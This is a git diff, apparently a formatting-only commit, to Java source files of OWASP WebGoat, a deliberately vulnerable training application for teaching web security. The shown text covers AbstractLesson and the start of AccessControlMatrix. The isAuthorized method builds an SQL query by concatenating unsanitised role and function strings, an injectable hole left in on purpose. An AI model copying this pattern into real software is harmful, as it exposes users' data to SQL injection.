+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
 *
@@ -62,829 +62,761 @@ import org.owasp.webgoat.session.WebgoatProperties; public abstract class AbstractLesson extends Screen implements Comparable { - /** - * Description of the Field - */ - public final static String ADMIN_ROLE = "admin"; + /** + * Description of the Field + */ + public final static String ADMIN_ROLE = "admin"; - public final static String CHALLENGE_ROLE = "challenge"; + public final static String CHALLENGE_ROLE = "challenge"; - /** - * Description of the Field - */ - public final static String HACKED_ADMIN_ROLE = "hacked_admin"; + /** + * Description of the Field + */ + public final static String HACKED_ADMIN_ROLE = "hacked_admin"; - /** - * Description of the Field - */ - public final static String USER_ROLE = "user"; + /** + * Description of the Field + */ + public final static String USER_ROLE = "user"; - private static int count = 1; + private static int count = 1; - private Integer id = null; + private Integer id = null; - final static IMG nextGrey = new IMG("images/right16.gif").setAlt("Next") - .setBorder(0).setHspace(0).setVspace(0); + final static IMG nextGrey = new IMG("images/right16.gif").setAlt("Next").setBorder(0).setHspace(0).setVspace(0); - final static IMG previousGrey = new IMG("images/left14.gif").setAlt( - "Previous").setBorder(0).setHspace(0).setVspace(0); + final static IMG previousGrey = new IMG("images/left14.gif").setAlt("Previous").setBorder(0).setHspace(0) + .setVspace(0); - private Integer ranking; + private Integer ranking; - private Category category; + private Category category; - private boolean hidden; + private boolean hidden; - private String sourceFileName; + private String sourceFileName; - private String lessonPlanFileName; + private String lessonPlanFileName; - private String lessonSolutionFileName; + private String lessonSolutionFileName; - private WebgoatContext webgoatContext; - - /** - * Constructor for the Lesson object - */ - public AbstractLesson() - { - id = new Integer(++count); - } + private 
WebgoatContext webgoatContext; - - public String getName() - { - String className = getClass().getName(); - return className.substring(className.lastIndexOf('.') + 1); - } - - - public void setRanking(Integer ranking) - { - this.ranking = ranking; - } - - - public void setHidden(boolean hidden) - { - this.hidden = hidden; - } - - public void update(WebgoatProperties properties) - { - String className = getClass().getName(); - className = className.substring(className.lastIndexOf(".") + 1); - setRanking(new Integer(properties.getIntProperty("lesson." + className - + ".ranking", getDefaultRanking().intValue()))); - String categoryRankingKey = "category." - + getDefaultCategory().getName() + ".ranking"; - // System.out.println("Category ranking key: " + categoryRankingKey); - Category tempCategory = Category.getCategory(getDefaultCategory() - .getName()); - tempCategory.setRanking(new Integer(properties.getIntProperty( - categoryRankingKey, getDefaultCategory().getRanking() - .intValue()))); - category = tempCategory; - setHidden(properties.getBooleanProperty("lesson." 
+ className - + ".hidden", getDefaultHidden())); - // System.out.println(className + " in " + tempCategory.getName() + " - // (Category Ranking: " + tempCategory.getRanking() + " Lesson ranking: - // " + getRanking() + ", hidden:" + hidden +")"); - } - - - public boolean isCompleted(WebSession s) - { - return getLessonTracker(s, this).getCompleted(); - } - - - /** - * Gets the credits attribute of the AbstractLesson object - * - * @return The credits value - */ - public abstract Element getCredits(); - - /** - * Description of the Method - * - * @param obj - * Description of the Parameter - * @return Description of the Return Value - */ - public int compareTo(Object obj) - { - return this.getRanking().compareTo(((AbstractLesson) obj).getRanking()); - } - - - /** - * Description of the Method - * - * @param obj - * Description of the Parameter - * @return Description of the Return Value - */ - public boolean equals(Object obj) - { - return this.getScreenId() == ((AbstractLesson) obj).getScreenId(); - } - - - /** - * Gets the category attribute of the Lesson object - * - * @return The category value - */ - public Category getCategory() - { - return category; - } - - - protected abstract Integer getDefaultRanking(); - - - protected abstract Category getDefaultCategory(); - - - protected abstract boolean getDefaultHidden(); - - /** - * Gets the fileMethod attribute of the Lesson class - * - * @param reader - * Description of the Parameter - * @param methodName - * Description of the Parameter - * @param numbers - * Description of the Parameter - * @return The fileMethod value - */ - public static String getFileMethod(BufferedReader reader, - String methodName, boolean numbers) - { - int count = 0; - StringBuffer sb = new StringBuffer(); - boolean echo = false; - boolean startCount = false; - int parenCount = 0; - - try + /** + * Constructor for the Lesson object + */ + public AbstractLesson() { - String line; + id = new Integer(++count); + } - while ((line = 
reader.readLine()) != null) - { - if ((line.indexOf(methodName) != -1) - && ((line.indexOf("public") != -1) - || (line.indexOf("protected") != -1) || (line - .indexOf("private") != -1))) + public String getName() + { + String className = getClass().getName(); + return className.substring(className.lastIndexOf('.') + 1); + } + + public void setRanking(Integer ranking) + { + this.ranking = ranking; + } + + public void setHidden(boolean hidden) + { + this.hidden = hidden; + } + + public void update(WebgoatProperties properties) + { + String className = getClass().getName(); + className = className.substring(className.lastIndexOf(".") + 1); + setRanking(new Integer(properties.getIntProperty("lesson." + className + ".ranking", getDefaultRanking() + .intValue()))); + String categoryRankingKey = "category." + getDefaultCategory().getName() + ".ranking"; + // System.out.println("Category ranking key: " + categoryRankingKey); + Category tempCategory = Category.getCategory(getDefaultCategory().getName()); + tempCategory.setRanking(new Integer(properties.getIntProperty(categoryRankingKey, getDefaultCategory() + .getRanking().intValue()))); + category = tempCategory; + setHidden(properties.getBooleanProperty("lesson." 
+ className + ".hidden", getDefaultHidden())); + // System.out.println(className + " in " + tempCategory.getName() + " + // (Category Ranking: " + tempCategory.getRanking() + " Lesson ranking: + // " + getRanking() + ", hidden:" + hidden +")"); + } + + public boolean isCompleted(WebSession s) + { + return getLessonTracker(s, this).getCompleted(); + } + + /** + * Gets the credits attribute of the AbstractLesson object + * + * @return The credits value + */ + public abstract Element getCredits(); + + /** + * Description of the Method + * + * @param obj + * Description of the Parameter + * @return Description of the Return Value + */ + public int compareTo(Object obj) + { + return this.getRanking().compareTo(((AbstractLesson) obj).getRanking()); + } + + /** + * Description of the Method + * + * @param obj + * Description of the Parameter + * @return Description of the Return Value + */ + public boolean equals(Object obj) + { + return this.getScreenId() == ((AbstractLesson) obj).getScreenId(); + } + + /** + * Gets the category attribute of the Lesson object + * + * @return The category value + */ + public Category getCategory() + { + return category; + } + + protected abstract Integer getDefaultRanking(); + + protected abstract Category getDefaultCategory(); + + protected abstract boolean getDefaultHidden(); + + /** + * Gets the fileMethod attribute of the Lesson class + * + * @param reader + * Description of the Parameter + * @param methodName + * Description of the Parameter + * @param numbers + * Description of the Parameter + * @return The fileMethod value + */ + public static String getFileMethod(BufferedReader reader, String methodName, boolean numbers) + { + int count = 0; + StringBuffer sb = new StringBuffer(); + boolean echo = false; + boolean startCount = false; + int parenCount = 0; + + try { - echo = true; - startCount = true; + String line; + + while ((line = reader.readLine()) != null) + { + if ((line.indexOf(methodName) != -1) + && 
((line.indexOf("public") != -1) || (line.indexOf("protected") != -1) || (line + .indexOf("private") != -1))) + { + echo = true; + startCount = true; + } + + if (echo && startCount) + { + if (numbers) + { + sb.append(pad(++count) + " "); + } + + sb.append(line + "\n"); + } + + if (echo && (line.indexOf("{") != -1)) + { + parenCount++; + } + + if (echo && (line.indexOf("}") != -1)) + { + parenCount--; + + if (parenCount == 0) + { + startCount = false; + echo = false; + } + } + } + + reader.close(); + } catch (Exception e) + { + System.out.println(e); + e.printStackTrace(); } - if (echo && startCount) - { - if (numbers) - { - sb.append(pad(++count) + " "); - } + return (sb.toString()); + } - sb.append(line + "\n"); + /** + * Reads text from a file into an ElementContainer. Each line in the file is represented in the + * ElementContainer by a StringElement. Each StringElement is appended with a new-line + * character. + * + * @param reader + * Description of the Parameter + * @param numbers + * Description of the Parameter + * @return Description of the Return Value + */ + public static String readFromFile(BufferedReader reader, boolean numbers) + { + return (getFileText(reader, numbers)); + } + + /** + * Gets the fileText attribute of the Screen class + * + * @param reader + * Description of the Parameter + * @param numbers + * Description of the Parameter + * @return The fileText value + */ + public static String getFileText(BufferedReader reader, boolean numbers) + { + int count = 0; + StringBuffer sb = new StringBuffer(); + + try + { + String line; + + while ((line = reader.readLine()) != null) + { + if (numbers) + { + sb.append(pad(++count) + " "); + } + sb.append(line + System.getProperty("line.separator")); + } + + reader.close(); + } catch (Exception e) + { + System.out.println(e); + e.printStackTrace(); } - if (echo && (line.indexOf("{") != -1)) + return (sb.toString()); + } + + /** + * Will this screen be included in an enterprise edition. 
+ * + * @return The ranking value + */ + public boolean isEnterprise() + { + return false; + } + + /** + * Gets the hintCount attribute of the Lesson object + * + * @param s + * The user's WebSession + * + * @return The hintCount value + */ + public int getHintCount(WebSession s) + { + return getHints(s).size(); + } + + protected abstract List getHints(WebSession s); + + /** + * Fill in a minor hint that will help people who basically get it, but are stuck on somthing + * silly. + * + * @param s + * The users WebSession + * + * @return The hint1 value + */ + public String getHint(WebSession s, int hintNumber) + { + return getHints(s).get(hintNumber); + } + + /** + * Gets the instructions attribute of the AbstractLesson object + * + * @return The instructions value + */ + public abstract String getInstructions(WebSession s); + + /** + * Gets the lessonPlan attribute of the Lesson object + * + * @return The lessonPlan value + */ + protected String getLessonName() + { + int index = this.getClass().getName().indexOf("lessons."); + return this.getClass().getName().substring(index + "lessons.".length()); + } + + /** + * Gets the title attribute of the HelloScreen object + * + * @return The title value + */ + public abstract String getTitle(); + + /** + * Gets the content of lessonPlanURL + * + * @param s + * The user's WebSession + * + * @return The HTML content of the current lesson plan + */ + public String getLessonPlan(WebSession s) + { + String src = null; + + try { - parenCount++; + // System.out.println("Loading lesson plan file: " + + // getLessonPlanFileName()); + src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonPlanFileName()))), false); + + } catch (Exception e) + { + // s.setMessage( "Could not find lesson plan for " + + // getLessonName()); + src = ("Could not find lesson plan for: " + getLessonName()); + + } + return src; + } + + /** + * Gets the ranking attribute of the Lesson object + * + * @return The ranking value + */ + 
public Integer getRanking() + { + if (ranking != null) + { + return ranking; + } + else + { + return getDefaultRanking(); + } + } + + /** + * Gets the hidden value of the Lesson Object + * + * @return The hidden value + */ + public boolean getHidden() + { + return this.hidden; + } + + /** + * Gets the role attribute of the AbstractLesson object + * + * @return The role value + */ + public String getRole() + { + // FIXME: Each lesson should have a role assigned to it. Each + // user/student + // should also have a role(s) assigned. The user would only be allowed + // to see lessons that correspond to their role. Eventually these roles + // will be stored in the internal database. The user will be able to + // hack + // into the database and change their role. This will allow the user to + // see the admin screens, once they figure out how to turn the admin + // switch on. + return USER_ROLE; + } + + /** + * Gets the uniqueID attribute of the AbstractLesson object + * + * @return The uniqueID value + */ + public int getScreenId() + { + return id.intValue(); + } + + public String getHtml_DELETE_ME(WebSession s) + { + String html = null; + + // FIXME: This doesn't work for the labs since they do not implement + // createContent(). 
+ String rawHtml = createContent(s).toString(); + // System.out.println("Getting raw html content: " + + // rawHtml.substring(0, Math.min(rawHtml.length(), 100))); + html = convertMetachars(AbstractLesson.readFromFile(new BufferedReader(new StringReader(rawHtml)), true)); + // System.out.println("Getting encoded html content: " + + // html.substring(0, Math.min(html.length(), 100))); + + return html; + } + + public String getSource(WebSession s) + { + String source = null; + String src = null; + + try + { + // System.out.println("Loading source file: " + + // getSourceFileName()); + src = convertMetacharsJavaCode(readFromFile(new BufferedReader(new FileReader(s + .getWebResource(getSourceFileName()))), true)); + + // TODO: For styled line numbers and better memory efficiency, + // use a custom FilterReader + // that performs the convertMetacharsJavaCode() transform plus + // optionally adds a styled + // line number. Wouldn't color syntax be great too? + } catch (IOException e) + { + s.setMessage("Could not find source file"); + src = ("Could not find source file"); } - if (echo && (line.indexOf("}") != -1)) + Html html = new Html(); + + Head head = new Head(); + head.addElement(new Title(getSourceFileName())); + + Body body = new Body(); + body.addElement(new StringElement(src)); + + html.addElement(head); + html.addElement(body); + + source = html.toString(); + + return source; + } + + public String getSolution(WebSession s) + { + String src = null; + + try { - parenCount--; - - if (parenCount == 0) - { - startCount = false; - echo = false; - } - } - } - - reader.close(); - } - catch (Exception e) - { - System.out.println(e); - e.printStackTrace(); - } - - return (sb.toString()); - } - - - /** - * Reads text from a file into an ElementContainer. Each line in the - * file is represented in the ElementContainer by a StringElement. Each - * StringElement is appended with a new-line character. 
- * - * @param reader - * Description of the Parameter - * @param numbers - * Description of the Parameter - * @return Description of the Return Value - */ - public static String readFromFile(BufferedReader reader, boolean numbers) - { - return (getFileText(reader, numbers)); - } - - - /** - * Gets the fileText attribute of the Screen class - * - * @param reader - * Description of the Parameter - * @param numbers - * Description of the Parameter - * @return The fileText value - */ - public static String getFileText(BufferedReader reader, boolean numbers) - { - int count = 0; - StringBuffer sb = new StringBuffer(); - - try - { - String line; - - while ((line = reader.readLine()) != null) - { - if (numbers) + src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName()))), false); + } catch (IOException e) { - sb.append(pad(++count) + " "); + s.setMessage("Could not find the solution file"); + src = ("Could not find the solution file"); } - sb.append(line + System.getProperty("line.separator")); - } - reader.close(); + Html html = new Html(); + + Head head = new Head(); + head.addElement(new Title(getLessonSolutionFileName())); + + Body body = new Body(); + body.addElement(new StringElement(src)); + + html.addElement(head); + html.addElement(body); + + return src; } - catch (Exception e) + + /** + * Get the link that can be used to request this screen. + * + * @return + */ + public String getLink() { - System.out.println(e); - e.printStackTrace(); + StringBuffer link = new StringBuffer(); + + link.append("attack?"); + link.append(WebSession.SCREEN); + link.append("="); + link.append(getScreenId()); + link.append("&"); + link.append(WebSession.MENU); + link.append("="); + link.append(getCategory().getRanking()); + return link.toString(); } - return (sb.toString()); - } - - - /** - * Will this screen be included in an enterprise edition. 
- * - * @return The ranking value - */ - public boolean isEnterprise() - { - return false; - } - - - /** - * Gets the hintCount attribute of the Lesson object - * @param s The user's WebSession - * - * @return The hintCount value - */ - public int getHintCount(WebSession s) - { - return getHints(s).size(); - } - - - protected abstract List getHints(WebSession s); - - - /** - * Fill in a minor hint that will help people who basically get it, but - * are stuck on somthing silly. - * @param s The users WebSession - * - * @return The hint1 value - */ - public String getHint(WebSession s, int hintNumber) - { - return getHints(s).get(hintNumber); - } - - - /** - * Gets the instructions attribute of the AbstractLesson object - * - * @return The instructions value - */ - public abstract String getInstructions(WebSession s); - - - /** - * Gets the lessonPlan attribute of the Lesson object - * - * @return The lessonPlan value - */ - protected String getLessonName() - { - int index = this.getClass().getName().indexOf("lessons."); - return this.getClass().getName().substring(index + "lessons.".length()); - } - - - /** - * Gets the title attribute of the HelloScreen object - * - * @return The title value - */ - public abstract String getTitle(); - - - /** - * Gets the content of lessonPlanURL - * - * @param s - * The user's WebSession - * - * @return The HTML content of the current lesson plan - */ - public String getLessonPlan(WebSession s) - { - String src = null; - - try + /** + * Get the link to the jsp page used to render this screen. + * + * @return + */ + public String getPage(WebSession s) { - // System.out.println("Loading lesson plan file: " + - // getLessonPlanFileName()); - src = readFromFile(new BufferedReader(new FileReader(s - .getWebResource(getLessonPlanFileName()))), false); - + return null; } - catch (Exception e) + + /** + * Get the link to the jsp template page used to render this screen. 
+ * + * @return + */ + public String getTemplatePage(WebSession s) { - // s.setMessage( "Could not find lesson plan for " + - // getLessonName()); - src = ("Could not find lesson plan for: " + getLessonName()); - + return null; } - return src; - } + public abstract String getCurrentAction(WebSession s); - /** - * Gets the ranking attribute of the Lesson object - * - * @return The ranking value - */ - public Integer getRanking() - { - if (ranking != null) + public abstract void setCurrentAction(WebSession s, String lessonScreen); + + /** + * Override this method to implement accesss control in a lesson. + * + * @param s + * @param functionId + * @return + */ + public boolean isAuthorized(WebSession s, int employeeId, String functionId) { - return ranking; + return false; } - else + + /** + * Override this method to implement accesss control in a lesson. + * + * @param s + * @param functionId + * @return + */ + public boolean isAuthorized(WebSession s, String role, String functionId) { - return getDefaultRanking(); + boolean authorized = false; + try + { + String query = "SELECT * FROM auth WHERE role = '" + role + "' and functionid = '" + functionId + "'"; + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + authorized = answer_results.first(); + } catch (SQLException sqle) + { + s.setMessage("Error authorizing"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error authorizing"); + e.printStackTrace(); + } + return authorized; } - } - - /** - * Gets the hidden value of the Lesson Object - * - * @return The hidden value - */ - public boolean getHidden() - { - return this.hidden; - } - - - /** - * Gets the role attribute of the AbstractLesson object - * - * @return The role value - */ - public String getRole() - { - // FIXME: Each lesson should have a role assigned to it. 
Each - // user/student - // should also have a role(s) assigned. The user would only be allowed - // to see lessons that correspond to their role. Eventually these roles - // will be stored in the internal database. The user will be able to - // hack - // into the database and change their role. This will allow the user to - // see the admin screens, once they figure out how to turn the admin - // switch on. - return USER_ROLE; - } - - - /** - * Gets the uniqueID attribute of the AbstractLesson object - * - * @return The uniqueID value - */ - public int getScreenId() - { - return id.intValue(); - } - - - public String getHtml_DELETE_ME(WebSession s) - { - String html = null; - - // FIXME: This doesn't work for the labs since they do not implement - // createContent(). - String rawHtml = createContent(s).toString(); - // System.out.println("Getting raw html content: " + - // rawHtml.substring(0, Math.min(rawHtml.length(), 100))); - html = convertMetachars(AbstractLesson.readFromFile(new BufferedReader( - new StringReader(rawHtml)), true)); - // System.out.println("Getting encoded html content: " + - // html.substring(0, Math.min(html.length(), 100))); - - return html; - } - - - public String getSource(WebSession s) - { - String source = null; - String src = null; - - try + public int getUserId(WebSession s) throws ParameterNotFoundException { - // System.out.println("Loading source file: " + - // getSourceFileName()); - src = convertMetacharsJavaCode(readFromFile(new BufferedReader( - new FileReader(s.getWebResource(getSourceFileName()))), - true)); - - // TODO: For styled line numbers and better memory efficiency, - // use a custom FilterReader - // that performs the convertMetacharsJavaCode() transform plus - // optionally adds a styled - // line number. Wouldn't color syntax be great too? 
+ return -1; } - catch (IOException e) + + public String getUserName(WebSession s) throws ParameterNotFoundException { - s.setMessage("Could not find source file"); - src = ("Could not find source file"); + return null; } - Html html = new Html(); - - Head head = new Head(); - head.addElement(new Title(getSourceFileName())); - - Body body = new Body(); - body.addElement(new StringElement(src)); - - html.addElement(head); - html.addElement(body); - - source = html.toString(); - - return source; - } - - - public String getSolution(WebSession s) - { - String src = null; - - try + /** + * Description of the Method + * + * @param windowName + * Description of the Parameter + * @return Description of the Return Value + */ + public static String makeWindowScript(String windowName) { - src = readFromFile(new BufferedReader( - new FileReader(s.getWebResource(getLessonSolutionFileName()))), - false); + // FIXME: make this string static + StringBuffer script = new StringBuffer(); + script.append("\n"); + + return script.toString(); } - catch (IOException e) + + /** + * Simply reads a url into an Element for display. 
CAUTION: you might want to tinker with any + * non-https links (href) + * + * @param url + * Description of the Parameter + * @return Description of the Return Value + */ + public static Element readFromURL(String url) { - s.setMessage("Could not find the solution file"); - src = ("Could not find the solution file"); + ElementContainer ec = new ElementContainer(); + + try + { + URL u = new URL(url); + HttpURLConnection huc = (HttpURLConnection) u.openConnection(); + BufferedReader reader = new BufferedReader(new InputStreamReader(huc.getInputStream())); + String line; + + while ((line = reader.readLine()) != null) + { + ec.addElement(new StringElement(line)); + } + + reader.close(); + } catch (Exception e) + { + System.out.println(e); + e.printStackTrace(); + } + + return (ec); } - Html html = new Html(); - - Head head = new Head(); - head.addElement(new Title(getLessonSolutionFileName())); - - Body body = new Body(); - body.addElement(new StringElement(src)); - - html.addElement(head); - html.addElement(body); - - return src; - } - - - /** - * Get the link that can be used to request this screen. - * - * @return - */ - public String getLink() - { - StringBuffer link = new StringBuffer(); - - link.append("attack?"); - link.append(WebSession.SCREEN); - link.append("="); - link.append(getScreenId()); - link.append("&"); - link.append(WebSession.MENU); - link.append("="); - link.append(getCategory().getRanking()); - return link.toString(); - } - - - /** - * Get the link to the jsp page used to render this screen. - * - * @return - */ - public String getPage(WebSession s) - { - return null; - } - - - /** - * Get the link to the jsp template page used to render this screen. 
- *
- * @return
- */
- public String getTemplatePage(WebSession s)
- {
- return null;
- }
-
-
- public abstract String getCurrentAction(WebSession s);
-
-
- public abstract void setCurrentAction(WebSession s, String lessonScreen);
-
- /**
- * Override this method to implement accesss control in a lesson.
- *
- * @param s
- * @param functionId
- * @return
- */
- public boolean isAuthorized(WebSession s, int employeeId, String functionId)
- {
- return false;
- }
-
-
- /**
- * Override this method to implement accesss control in a lesson.
- *
- * @param s
- * @param functionId
- * @return
- */
- public boolean isAuthorized(WebSession s, String role, String functionId)
- {
- boolean authorized = false;
- try
+ /**
+ * Description of the Method
+ *
+ * @param reader
+ * Description of the Parameter
+ * @param numbers
+ * Description of the Parameter
+ * @param methodName
+ * Description of the Parameter
+ * @return Description of the Return Value
+ */
+ public static Element readMethodFromFile(BufferedReader reader, String methodName, boolean numbers)
 {
- String query = "SELECT * FROM auth WHERE role = '" + role
- + "' and functionid = '" + functionId + "'";
- try
- {
- Statement answer_statement = WebSession.getConnection(s)
- .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
- ResultSet answer_results = answer_statement.executeQuery(query);
- authorized = answer_results.first();
- }
- catch (SQLException sqle)
- {
- s.setMessage("Error authorizing");
- sqle.printStackTrace();
- }
+ PRE pre = new PRE().addElement(getFileMethod(reader, methodName, numbers));
+
+ return (pre);
 }
- catch (Exception e)
+
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ */
+ public void handleRequest(WebSession s)
 {
- s.setMessage("Error authorizing");
- e.printStackTrace();
+ // call createContent first so messages will go somewhere
+
+ Form form = new Form(getFormAction(), Form.POST).setName("form").setEncType("");
+
+ form.addElement(createContent(s));
+
+ setContent(form);
 }
- return authorized;
- }
-
- public int getUserId(WebSession s) throws ParameterNotFoundException
- {
- return -1;
- }
-
-
- public String getUserName(WebSession s) throws ParameterNotFoundException
- {
- return null;
- }
-
- /**
- * Description of the Method
- *
- * @param windowName
- * Description of the Parameter
- * @return Description of the Return Value
- */
- public static String makeWindowScript(String windowName)
- {
- // FIXME: make this string static
- StringBuffer script = new StringBuffer();
- script.append("\n");
-
- return script.toString();
- }
-
-
- /**
- * Simply reads a url into an Element for display. CAUTION: you might
- * want to tinker with any non-https links (href)
- *
- * @param url
- * Description of the Parameter
- * @return Description of the Return Value
- */
- public static Element readFromURL(String url)
- {
- ElementContainer ec = new ElementContainer();
-
- try
+ public String getFormAction()
 {
- URL u = new URL(url);
- HttpURLConnection huc = (HttpURLConnection) u.openConnection();
- BufferedReader reader = new BufferedReader(new InputStreamReader(
- huc.getInputStream()));
- String line;
-
- while ((line = reader.readLine()) != null)
- {
- ec.addElement(new StringElement(line));
- }
-
- reader.close();
+ return getLink();
 }
- catch (Exception e)
+
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
+ */
+
+ public String toString()
 {
- System.out.println(e);
- e.printStackTrace();
+ return getTitle();
 }
- return (ec);
- }
+ public String getLessonPlanFileName()
+ {
+ return lessonPlanFileName;
+ }
+ public void setLessonPlanFileName(String lessonPlanFileName)
+ {
+ this.lessonPlanFileName = lessonPlanFileName;
+ }
- /**
- * Description of the Method
- *
- * @param reader
- * Description of the Parameter
- * @param numbers
- * Description of the Parameter
- * @param methodName
- * Description
of the Parameter
- * @return Description of the Return Value
- */
- public static Element readMethodFromFile(BufferedReader reader,
- String methodName, boolean numbers)
- {
- PRE pre = new PRE().addElement(getFileMethod(reader, methodName,
- numbers));
+ public String getLessonSolutionFileName()
+ {
+ return lessonSolutionFileName;
+ }
- return (pre);
- }
+ public void setLessonSolutionFileName(String lessonSolutionFileName)
+ {
+ this.lessonSolutionFileName = lessonSolutionFileName;
+ }
+ public String getSourceFileName()
+ {
+ return sourceFileName;
+ }
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- */
- public void handleRequest(WebSession s)
- {
- // call createContent first so messages will go somewhere
+ public void setSourceFileName(String sourceFileName)
+ {
+ // System.out.println("Setting source file of lesson " + this + " to: "
+ // + sourceFileName);
+ this.sourceFileName = sourceFileName;
+ }
- Form form = new Form(getFormAction(), Form.POST).setName("form")
- .setEncType("");
-
- form.addElement(createContent(s));
-
- setContent(form);
- }
-
-
- public String getFormAction()
- {
- return getLink();
- }
-
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public String toString()
- {
- return getTitle();
- }
-
-
- public String getLessonPlanFileName()
- {
- return lessonPlanFileName;
- }
-
-
- public void setLessonPlanFileName(String lessonPlanFileName)
- {
- this.lessonPlanFileName = lessonPlanFileName;
- }
-
- public String getLessonSolutionFileName()
- {
- return lessonSolutionFileName;
- }
-
-
- public void setLessonSolutionFileName(String lessonSolutionFileName)
- {
- this.lessonSolutionFileName = lessonSolutionFileName;
- }
-
- public String getSourceFileName()
- {
- return sourceFileName;
- }
-
-
- public void setSourceFileName(String sourceFileName)
- {
- // System.out.println("Setting source file of lesson " +
this + " to: "
- // + sourceFileName);
- this.sourceFileName = sourceFileName;
- }
-
-
- public WebgoatContext getWebgoatContext() {
+ public WebgoatContext getWebgoatContext()
+ {
 return webgoatContext;
 }
-
- public void setWebgoatContext(WebgoatContext webgoatContext) {
+ public void setWebgoatContext(WebgoatContext webgoatContext)
+ {
 this.webgoatContext = webgoatContext;
 }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/AccessControlMatrix.java b/main/project/JavaSource/org/owasp/webgoat/lessons/AccessControlMatrix.java
index c13cbcc4a..7d38496a7 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/AccessControlMatrix.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/AccessControlMatrix.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;
@@ -13,272 +13,264 @@ import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
- *
- * @author Jeff Williams Aspect Security
- * @created October 28, 2003
+ *
+ * @author Jeff Williams Aspect Security
+ * @created October 28, 2003
 */
 public class AccessControlMatrix extends LessonAdapter
 {
- public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-
- private final static String RESOURCE = "Resource";
+ public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+ .addElement(
+ new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+ .setVspace(0));
- private final static String USER = "User";
+ private final static String RESOURCE = "Resource";
- private final static String[] resources = { "Public Share",
- "Time Card Entry", "Performance Review", "Time Card Approval",
- "Site Manager", "Account Manager" };
+ private final static String USER = "User";
- private final static String[] roles = { "Public", "User", "Manager",
- "Admin" };
+ private final static String[] resources = { "Public Share", "Time Card Entry", "Performance Review",
+ "Time Card Approval", "Site Manager", "Account Manager" };
- private final static String[] users = { "Moe", "Larry", "Curly", "Shemp" };
+ private final static String[] roles = { "Public", "User", "Manager", "Admin" };
+ private final static String[] users = { "Moe", "Larry", "Curly",
"Shemp" };
- /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
+ */
+ protected Element createContent(WebSession s)
+ {
 ElementContainer ec = new ElementContainer();
-
+
 try
 {
- String user = s.getParser().getRawParameter(USER, users[0]);
- String resource = s.getParser().getRawParameter(RESOURCE, resources[0]);
- String credentials = getRoles(user).toString();
-
- Table t = new Table().setCellSpacing(0).setCellPadding(2)
